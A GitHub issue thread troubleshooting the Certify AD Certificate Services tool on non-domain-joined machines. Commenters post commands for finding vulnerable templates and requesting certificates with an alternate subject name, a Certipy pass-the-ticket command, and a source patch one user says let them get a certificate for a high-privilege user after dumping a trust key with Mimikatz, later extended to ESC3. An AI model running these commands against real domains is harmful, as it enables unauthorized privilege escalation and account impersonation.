Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Not working in non domain computer #13

Open
puniaze opened this issue Feb 14, 2022 · 9 comments
Open

Not working in non domain computer #13

puniaze opened this issue Feb 14, 2022 · 9 comments

Comments

@puniaze
Copy link

puniaze commented Feb 14, 2022

Hi, Probably you already aware about problems related to running certify in non domain machine. Even if I tried different test cases (runas, netonly, ptt, cmd over pth) each time I got exception and I was not able to request certificate. Could you please recommend me what can I do for this in case if you don't plan any code updates for this issue?
Thanks

@git-oaktree
Copy link

Try the /domain and /ldapserver with the find function. E.g. certify.exe find /domain:github.com /ldapserver:4.2.2.2

@hypnoticpattern
Copy link

If you just need to query the ldap server you can do that from a non-domain joined machine using:

Runas /user:[email protected] /netonly powershell`

and then run the commands you need:

.\Certify.exe find /vulnerable /domain:corp.contoso.com /ldapserver:10.0.10.1

All the information about templates and permissions are correctly listed. The problem is when you need to request a certificate that Certify errors out:

PS C:\Users\User\Desktop\Tools> .\Certify.exe request /domain:corp.contoso.com /ca:ADCS01.corp.contoso.com\ContosoCA /template:"Copy of RAS and IAS Server" /altname:dad /subject:"CN=Low Privilege,CN=Users,DC=corp,DC=contoso,DC=com"

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : WINDOWS10-TESTI\User

[*] Template                : Copy of RAS and IAS Server
[*] Subject                 : CN=Low Privilege,CN=Users,DC=corp,DC=contoso,DC=com
[*] AltName                 : dad

[!] Unhandled Certify exception:

System.Runtime.InteropServices.COMException (0x80094015): CertEnroll::CX509CertificateRequestPkcs10::InitializeFromPrivateKey: An enrollment policy server cannot be located. 0x80094015 (-2146877419 CERTSRV_E_NO_POLICY_SERVER)
   at CERTENROLLLib.CX509CertificateRequestPkcs10Class.InitializeFromPrivateKey(X509CertificateEnrollmentContext Context, IX509PrivateKey pPrivateKey, String strTemplateName)
   at Certify.Cert.CreateCertRequestMessage(String templateName, Boolean machineContext, String subjectName, String altName)
   at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, Boolean install)
   at Certify.Commands.Request.Execute(Dictionary`2 arguments)
   at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)


Certify completed in 00:00:05.3014542

If I join the machine to the domain the same command succeed.

@bestrocker221
Copy link

I have the same problem, even on a runas netonly session, the certificate request takes the current user context (not the runas) in a non domain joined computer.
is there any way around this?

@heyquentin
Copy link

Same problem here too.

@NickYan7
Copy link

certipy (https://github.com/ly4k/Certipy) can solve this, which also work out with my issue on #27 .

e.g.

// ptt
certipy -u [email protected] -k -nopass -ca domain-ca -target dc.domain.com -template User -debug

@ken013194
Copy link

I hit the same issue too. While the scenario is a bit different where i am requesting the certificate from a trusted domain in a one way outbound trust environment. Would like to know if there are any workaround for certify. Certipy shall work but haven’t test out.

@GonZ0s
Copy link

GonZ0s commented Apr 14, 2023

I hit the same issue too. While the scenario is a bit different where i am requesting the certificate from a trusted domain in a one way outbound trust environment. Would like to know if there are any workaround for certify. Certipy shall work but haven’t test out.

I'm in the same boat. Did u figure out a solution yet?

@Eliotsehr
Copy link

Eliotsehr commented Sep 12, 2023

Hello,

I ended up a similar situation and I think I found a solution so I'm sharing my experience in the hope that it helps.

My scenario was :

  • I have Domain Admin access in Domain A which has a One-Way Outbound Trust with Domain B
  • I dumped the shared key in the Trusted Domain Object using Mimikatz on Domain A DC
  • I used that key to request a TGT for the Domain A trusted account the exists in Domain B
  • I used that TGT to impersonate this user (let's say A$)

So I'm in a PTT session on a computer outside of Domain B and when I try to use Certify I have the same error saying that "An enrollment policy server cannot be located."

To fix this issue I ended up changing Certify source code in Cert.cs line 89 from :

objPkcs10.InitializeFromPrivateKey(context, privateKey, templateName);

To :

objPkcs10.InitializeFromPrivateKey(context, privateKey, "");

CX509ExtensionTemplateName templateExtension = new CX509ExtensionTemplateName();
templateExtension.InitializeEncode(templateName);
objPkcs10.X509Extensions.Add((CX509Extension)templateExtension);

Why does it work ? I have no clue but I saw similar issues on Stackoverflow so I gave it a shot and I was then able to request a certificate for a high privilege user, then a TGT, etc.

@topolsa
Copy link

topolsa commented Dec 14, 2024

Actually, it’s better to apply this code replacement in two places: in the CreateCertRequestMessage and CreateCertRequestOnBehalfMessage methods.
This way, you can execute more complex attacks, including ESC3, from a non-domain host.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

10 participants